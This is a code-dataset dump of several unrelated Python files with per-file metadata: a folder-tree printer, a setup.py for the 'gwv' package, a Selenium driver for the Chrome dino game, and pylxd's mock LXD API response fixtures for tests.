        if folder_ptr == tee:
            preamble = preamble + branch
        else:
            preamble = preamble + space

        file_keys: List[str] = []
        dir_keys: List[str] = []
        for key, val in self.children.items():
            if val.is_dir:
                dir_keys.append(key)
            else:
                file_keys.append(key)

        for index, key in enumerate(sorted(dir_keys)):
            # Only the very last child (no files after it) gets the
            # corner connector.
            if (index == len(dir_keys) - 1) and len(file_keys) == 0:
                self.children[key].stringify_tree(str_list, preamble, last)
            else:
                self.children[key].stringify_tree(str_list, preamble, tee)

        for index, file in enumerate(sorted(file_keys)):
            pointer = last if (index == len(file_keys) - 1) else tee
            str_list.append(f"{preamble}{pointer}{file}\n")
def _create_folder_from_file_list(
    filename: str,
    file_list: List[str],
    include: "GlobPattern" = "**",
    exclude: "GlobPattern" = (),
) -> Folder:
    """Build a Folder tree named *filename* for the matching files.

    Only entries of *file_list* accepted by the include/exclude glob
    patterns are added to the tree.
    """
    matcher = _GlobGroup(include, exclude, "/")
    root = Folder(filename, True)
    for entry in file_list:
        if matcher.matches(entry):
            root.add_file(entry)
    return root
| 31.822785
| 79
| 0.58393
|
4a159d561b6ac457c93509b276e83b469b8ca496
| 766
|
py
|
Python
|
setup.py
|
kurgm/gwv
|
1a5cd57481c6312ebbb9a99e45b302f82a5e0e92
|
[
"MIT"
] | 1
|
2020-01-16T16:56:00.000Z
|
2020-01-16T16:56:00.000Z
|
setup.py
|
kurgm/gwv
|
1a5cd57481c6312ebbb9a99e45b302f82a5e0e92
|
[
"MIT"
] | 3
|
2017-12-21T13:30:25.000Z
|
2020-03-12T14:46:07.000Z
|
setup.py
|
kurgm/gwv
|
1a5cd57481c6312ebbb9a99e45b302f82a5e0e92
|
[
"MIT"
] | null | null | null |
from distutils.command.build import build
from setuptools import find_packages
from setuptools import setup
from gwv import __version__
class my_build(build):
    """``build`` command that regenerates data files before building."""

    def _pre_build(self):
        # Imported lazily: bdat is excluded from the installed package
        # (see find_packages below) and only exists in the source tree.
        import bdat
        bdat.main()

    def run(self):
        self._pre_build()
        build.run(self)
setup(
    name="gwv",
    version=__version__,
    # Ship the package without its tests or the bdat build-time generator.
    packages=find_packages(exclude=[
        "*.tests", "*.tests.*", "tests.*", "tests",
        "*.bdat", "*.bdat.*", "bdat.*", "bdat"
    ]),
    install_requires=[
        "pyyaml",
    ],
    entry_points={
        "console_scripts": [
            "gwv = gwv.gwv:main"
        ]
    },
    # Run the bdat data-file generation step before the standard build.
    cmdclass={'build': my_build},
    package_data={
        "gwv": ["data/*", "data/3rd/*"],
    },
    test_suite="tests",
)
| 19.15
| 51
| 0.55483
|
4a159dd05c9b321fa7b6e82f2c2dee8ae9f495ae
| 1,902
|
py
|
Python
|
GameDriver.py
|
m4rquee/ai-dino
|
0d1be7676246166c25c5b52554724766ea0e96a9
|
[
"MIT"
] | 1
|
2019-02-15T15:57:04.000Z
|
2019-02-15T15:57:04.000Z
|
GameDriver.py
|
m4rquee/ai-dino
|
0d1be7676246166c25c5b52554724766ea0e96a9
|
[
"MIT"
] | null | null | null |
GameDriver.py
|
m4rquee/ai-dino
|
0d1be7676246166c25c5b52554724766ea0e96a9
|
[
"MIT"
] | null | null | null |
import time
import pyscreenshot as ImageGrab
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
class GameDriver(webdriver.Chrome):
    """Chrome webdriver wrapper that drives the Chrome dino game."""

    def __init__(self, executable_path='./chromedriver'):
        # Actions an agent can send: jump, duck, or do nothing.
        self.keys = [Keys.ARROW_UP, Keys.ARROW_DOWN, Keys.NULL]
        self.chrome_options = webdriver.ChromeOptions()
        # self.chrome_options.add_argument('--headless')
        self.chrome_options.add_argument('--no-sandbox')
        self.chrome_options.add_argument('--mute-audio')
        self.chrome_options.add_argument('--disable-infobars')
        self.chrome_options.add_argument('--disable-extensions')
        self.chrome_options.add_argument('--window-size=720,480')
        super().__init__(executable_path, options=self.chrome_options)
        self.actions = webdriver.ActionChains(self)
        self.get('https://chromedino.com/')  # The default url doesn't work with headless

    def init(self):
        # Press jump once to start the game, then wait for it to begin.
        self.send_key()
        time.sleep(0.5)

    def get_game_prop(self, prop):
        """Read a property from the page's Runner game instance."""
        return self.execute_script('return Runner.instance_["%s"]' % prop)

    def get_score(self):
        """Return the current distance ran (the game's score metric)."""
        return self.get_game_prop('distanceRan')

    def restart(self):
        """Restart the game and give it time to settle."""
        self.execute_script('Runner.instance_.restart()')
        time.sleep(3)

    def send_key(self, key=Keys.ARROW_UP):
        # NOTE(review): the same ActionChains object is reused across
        # calls; verify that perform() does not replay accumulated keys
        # on this selenium version.
        self.actions.send_keys(key)
        self.actions.perform()

    def take_screenshot(self):
        # Assumes the game canvas sits inside this fixed screen region
        # — TODO confirm against the actual window placement.
        return ImageGrab.grab(bbox=(10, 10, 510, 510))

    def take_n_screenshot(self, n=4):
        """Yield *n* screenshots, ~0.1s apart."""
        for _ in range(n):
            yield self.take_screenshot()
            time.sleep(0.1)

    def run_loop(self):
        """Generator protocol: yields frame batches, receives the next key.

        The caller primes it, then sends a key per step via .send().
        """
        time.sleep(1)
        self.restart()
        key = Keys.ARROW_UP
        while not self.get_game_prop('playing'):
            self.send_key(key)
            key = yield self.take_n_screenshot()
        yield
| 32.237288
| 89
| 0.659306
|
4a159dfdab315b704764997a7b5592735df9c44e
| 34,803
|
py
|
Python
|
pylxd/tests/mock_lxd.py
|
surfernsk/pylxd
|
8f641f2381f10b671854899da909a459485e57c3
|
[
"Apache-2.0"
] | 247
|
2015-05-26T21:39:38.000Z
|
2022-03-23T23:56:12.000Z
|
pylxd/tests/mock_lxd.py
|
surfernsk/pylxd
|
8f641f2381f10b671854899da909a459485e57c3
|
[
"Apache-2.0"
] | 417
|
2015-05-31T12:57:55.000Z
|
2022-03-28T14:35:09.000Z
|
pylxd/tests/mock_lxd.py
|
surfernsk/pylxd
|
8f641f2381f10b671854899da909a459485e57c3
|
[
"Apache-2.0"
] | 170
|
2015-05-31T11:10:59.000Z
|
2022-01-18T01:36:17.000Z
|
import json
def instances_POST(request, context):
    """Mock LXD instance creation: pending async operation, 202 Accepted."""
    context.status_code = 202
    payload = {
        "type": "async",
        "operation": "/1.0/operations/operation-abc?project=default",
    }
    return json.dumps(payload)
def instance_POST(request, context):
    """Mock instance action: plain async op, or migration secrets.

    Returns a dict (not a JSON string) — requests_mock serialises it when
    the rule is registered with ``json=``.
    """
    context.status_code = 202
    operation = "/1.0/operations/operation-abc?project=default"
    if request.json().get("migration", False):
        # Migration responses carry the websocket secrets.
        return {
            "type": "async",
            "operation": operation,
            "metadata": {
                "metadata": {
                    "0": "abc",
                    "1": "def",
                    "control": "ghi",
                }
            },
        }
    return {
        "type": "async",
        "operation": operation,
    }
def instance_PUT(request, context):
    """Mock instance update: async operation, 202 Accepted (dict body)."""
    context.status_code = 202
    payload = {
        "type": "async",
        "operation": "/1.0/operations/operation-abc?project=default",
    }
    return payload
def instance_DELETE(request, context):
    """Mock instance deletion: async operation, 202 Accepted."""
    context.status_code = 202
    payload = {
        "type": "async",
        "operation": "/1.0/operations/operation-abc?project=default",
    }
    return json.dumps(payload)
def images_POST(request, context):
    """Mock image creation: pending image-create operation, 202 Accepted."""
    context.status_code = 202
    payload = {
        "type": "async",
        "operation": "/1.0/operations/images-create-operation?project=default",
    }
    return json.dumps(payload)
def image_DELETE(request, context):
    """Mock image deletion: async operation, 202 Accepted."""
    context.status_code = 202
    payload = {
        "type": "async",
        "operation": "/1.0/operations/operation-abc?project=default",
    }
    return json.dumps(payload)
def networks_GET(request, _):
    """Mock network info: echoes the network name from the request path."""
    name = request.path.split("/")[-1]
    metadata = {
        "config": {
            "ipv4.address": "10.80.100.1/24",
            "ipv4.nat": "true",
            "ipv6.address": "none",
            "ipv6.nat": "false",
        },
        "name": name,
        "description": "Network description",
        "type": "bridge",
        "managed": True,
        "used_by": [],
    }
    return json.dumps({"type": "sync", "metadata": metadata})
def networks_POST(_, context):
    """Mock network creation: empty sync response, 200 OK."""
    context.status_code = 200
    payload = {"type": "sync", "metadata": {}}
    return json.dumps(payload)
def networks_DELETE(_, context):
    """Mock network deletion: sync body pointing at an operation, 202."""
    context.status_code = 202
    payload = {
        "type": "sync",
        "operation": "/1.0/operations/operation-abc?project=default",
    }
    return json.dumps(payload)
def profile_GET(request, context):
    """Mock profile info: echoes the profile name from the request path."""
    profile_name = request.path.split("/")[-1]
    metadata = {
        "name": profile_name,
        "description": "An description",  # sic: fixture text preserved
        "config": {},
        "devices": {},
        "used_by": [],
    }
    return json.dumps({"type": "sync", "metadata": metadata})
def profiles_POST(request, context):
    """Mock profile creation: empty sync response, 200 OK."""
    context.status_code = 200
    payload = {"type": "sync", "metadata": {}}
    return json.dumps(payload)
def profile_DELETE(request, context):
    """Mock profile deletion: sync body pointing at an operation, 200 OK."""
    context.status_code = 200
    payload = {
        "type": "sync",
        "operation": "/1.0/operations/operation-abc?project=default",
    }
    return json.dumps(payload)
def projects_GET(request, context):
    """Mock project info: echoes the project name from the request path."""
    project_name = request.path.split("/")[-1]
    metadata = {
        "name": project_name,
        "description": "new project is new",
        "config": {
            "features.images": "true",
        },
        "used_by": [],
    }
    return json.dumps({"type": "sync", "metadata": metadata})
def projects_POST(request, context):
    """Mock project creation: empty sync response, 200 OK."""
    context.status_code = 200
    payload = {"type": "sync", "metadata": {}}
    return json.dumps(payload)
def snapshot_DELETE(request, context):
    """Mock deleting a snapshot: 202 Accepted plus an async operation URL."""
    context.status_code = 202
    payload = {
        "type": "async",
        "operation": "/1.0/operations/operation-abc?project=default",
    }
    return json.dumps(payload)
RULES = [
# General service endpoints
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {
"certificate": "an-pem-cert",
},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"auth": "trusted",
"environment": {},
"api_extensions": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0$",
},
# Certificates
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-certificate",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/certificates$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/eaf55b72fc23aa516d709271df9b0116064bf8cfa009cf34c67c33ad32c2320c$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"certificate": "certificate-content",
"fingerprint": "an-certificate",
"type": "client",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
{
"json": {
"type": "sync",
"metadata": {},
},
"status_code": 202,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/certificates/an-certificate$",
},
# Cluster
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"enabled": "true",
"member_config": [
{
"entity": "storage-pool",
"name": "local",
"key": "source",
"value": "",
"description": '"source" property for storage pool "local"',
},
{
"entity": "storage-pool",
"name": "local",
"key": "volatile.initial_source",
"value": "",
"description": '"volatile.initial_source" property for'
' storage pool "local"',
},
],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster$",
},
# Cluster Members
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/certificates/an-member",
"http://pylxd.test/1.0/certificates/nd-member",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"server_name": "an-member",
"url": "https://10.1.1.101:8443",
"database": "false",
"status": "Online",
"message": "fully operational",
"architecture": "x86_64",
"description": "AMD Epyc 32c/64t",
"failure_domain": "rack1",
"roles": [],
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/cluster/members/an-member$",
},
# cluster-certificate
{
"text": json.dumps({"type": "sync", "status": "Success", "status_code": 200}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/cluster/certificate$",
},
# Instances
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd2.test/1.0/instances/an-instance",
],
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances$",
},
{
"text": instances_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances\?target=an-remote",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd2.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"devices": {"root": {"path": "/", "type": "disk"}},
"ephemeral": True,
"expanded_config": {
"security.privileged": "true",
},
"expanded_devices": {
"eth0": {
"name": "eth0",
"nictype": "bridged",
"parent": "lxdbr0",
"type": "nic",
},
"root": {"path": "/", "type": "disk"},
},
"profiles": ["default"],
"stateful": False,
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "sync",
"metadata": {
"status": "Running",
"status_code": 103,
"disk": {
"root": {
"usage": 10,
}
},
"memory": {
"usage": 15,
"usage_peak": 20,
"swap_usage": 0,
"swap_usage_peak": 5,
},
"network": {
"l0": {
"addresses": [
{
"family": "inet",
"address": "127.0.0.1",
"netmask": "8",
"scope": "local",
}
],
}
},
"pid": 69,
"processes": 100,
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "an-new-remote-instance",
"architecture": "x86_64",
"config": {
"security.privileged": "true",
},
"created_at": "1983-06-16T00:00:00-00:00",
"last_used_at": "1983-06-16T00:00:00-00:00",
"description": "Some description",
"location": "an-remote",
"status": "Running",
"status_code": 103,
"unsupportedbypylxd": (
"This attribute is not supported by "
"pylxd. We want to test whether the mere presence of it "
"makes it crash."
),
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-new-remote-instance$",
},
{
"status_code": 202,
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance/state$",
},
{
"json": instance_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"text": instance_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
{
"json": {
"type": "async",
"metadata": {
"metadata": {
"fds": {
"0": "abc",
"1": "def",
"2": "ghi",
"control": "jkl",
}
},
},
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/exec$",
},
{
"json": instance_PUT,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/instances/an-instance$",
},
# Instance Snapshots
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"/1.0/instances/an_instance/snapshots/an-snapshot",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"name": "an_instance/an-snapshot",
"stateful": False,
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
{
"text": snapshot_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/snapshots/an-snapshot$",
},
# Instance files
{
"text": "This is a getted file",
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fgetted$",
},
{
"text": '{"some": "value"}',
"method": "GET",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fjson-get$",
},
{
"method": "POST",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
{
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/instances/an-instance/files\?path=%2Ftmp%2Fputted$",
},
# Images
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/images$",
},
{
"text": images_POST,
"method": "POST",
"url": r"^http://pylxd2.test/1.0/images$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"aliases": [
{
"name": "an-alias",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}
],
"architecture": "x86_64",
"cached": False,
"filename": "a_image.tar.bz2",
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
"public": False,
"properties": {},
"size": 1,
"auto_update": False,
"created_at": "1983-06-16T02:42:00Z",
"expires_at": "1983-06-16T02:42:00Z",
"last_used_at": "1983-06-16T02:42:00Z",
"uploaded_at": "1983-06-16T02:42:00Z",
},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": json.dumps(
{
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
}
),
"status_code": 202,
"method": "PUT",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
{
"text": "0" * 2048,
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/export$",
},
{
"text": image_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855$",
},
# Image Aliases
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {
"name": "an-alias",
"description": "an-alias",
"target": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {"type": "sync", "status": "Success", "metadata": None},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/aliases$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/an-alias$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": None,
},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/images/aliases/b-alias$",
},
# Images secret
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"metadata": {"metadata": {"secret": "abcdefg"}},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/images/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855/secret$",
},
# Networks
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/networks/lo",
"http://pylxd.test/1.0/networks/eth0",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"text": networks_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/networks$",
},
{
"json": {
"type": "sync",
"metadata": {
"name": "lo",
"type": "loopback",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/lo$",
},
{
"text": networks_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/networks/eth(0|1|2)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
{
"text": networks_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/networks/eth0$",
},
# Storage Pools
{
"json": {
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/storage-pools/lxd",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {
"type": "sync",
"metadata": {
"config": {"size": "0", "source": "/var/lib/lxd/disks/lxd.img"},
"description": "",
"name": "lxd",
"driver": "zfs",
"used_by": [],
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd$",
},
# Storage Resources
{
"json": {
"type": "sync",
"metadata": {
"space": {"used": 207111192576, "total": 306027577344},
"inodes": {"used": 3275333, "total": 18989056},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/resources$",
},
# Storage Volumes
{
"json": {
"type": "sync",
"metadata": [
"/1.0/storage-pools/default/volumes/instances/c1",
"/1.0/storage-pools/default/volumes/instances/c2",
"/1.0/storage-pools/default/volumes/containers/c3",
"/1.0/storage-pools/default/volumes/containers/c4",
"/1.0/storage-pools/default/volumes/virtual-machines/vm1",
"/1.0/storage-pools/default/volumes/virtual-machines/vm2",
"/1.0/storage-pools/default/volumes/images/i1",
"/1.0/storage-pools/default/volumes/images/i2",
"/1.0/storage-pools/default/volumes/custom/cu1",
],
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes$",
},
# create a sync storage volume
{
"json": {"type": "sync"},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom$",
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# create an async storage volume
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
},
"status_code": 202,
"method": "POST",
"url": (r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom$"),
},
{
"json": {
"type": "sync",
"status": "Success",
"status_code": 200,
"error_code": 0,
"error": "",
"metadata": {
"type": "custom",
"used_by": [],
"name": "cu1",
"config": {
"block.filesystem": "ext4",
"block.mount_options": "discard",
"size": "10737418240",
},
},
},
"method": "GET",
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
# rename a storage volume, sync
{
"json": {
"type": "sync",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# rename a storage volume, async
{
"json": {
"type": "async",
"operation": "/1.0/operations/operation-abc?project=default",
"metadata": {"control": "secret1", "fs": "secret2"},
},
"method": "POST",
"status_code": 202,
"url": (
r"^http://pylxd.test/1.0/storage-pools/" "async-lxd/volumes/custom/cu1$"
),
},
{
"json": {"type": "sync"},
"method": "PUT",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "PATCH",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
{
"json": {"type": "sync"},
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/storage-pools/lxd/volumes/custom/cu1$",
},
# Profiles
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/profiles/an-profile",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profiles_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles$",
},
{
"text": profile_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile|an-renamed-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/profiles/(an-profile|an-new-profile)$",
},
# Projects
{
"text": json.dumps(
{
"type": "sync",
"metadata": [
"http://pylxd.test/1.0/projects/test-project",
],
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": projects_GET,
"method": "GET",
"url": r"^http://pylxd.test/1.0/projects/(test-project|new-project)$",
},
{
"text": projects_POST,
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "PUT",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
{
"text": json.dumps({"type": "sync"}),
"method": "POST",
"url": r"^http://pylxd.test/1.0/projects/(new-project)$",
},
{
"text": profile_DELETE,
"method": "DELETE",
"url": r"^http://pylxd.test/1.0/projects/(test-project)$",
},
# Operations
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc", "metadata": {"return": 0}},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/operation-abc/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {
"id": "images-create-operation",
"metadata": {
"fingerprint": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
},
},
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd.test/1.0/operations/images-create-operation/wait$",
},
{
"text": json.dumps(
{
"type": "sync",
"metadata": {"id": "operation-abc"},
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation$",
},
{
"text": json.dumps(
{
"type": "sync",
}
),
"method": "GET",
"url": r"^http://pylxd2.test/1.0/operations/images-create-operation/wait$",
},
]
| 29.950947
| 121
| 0.410367
|
4a159e631ad1abd365562bf10e8180b2e0b0aca4
| 149
|
py
|
Python
|
tests/__init__.py
|
tom-andersson/neuralprocesses
|
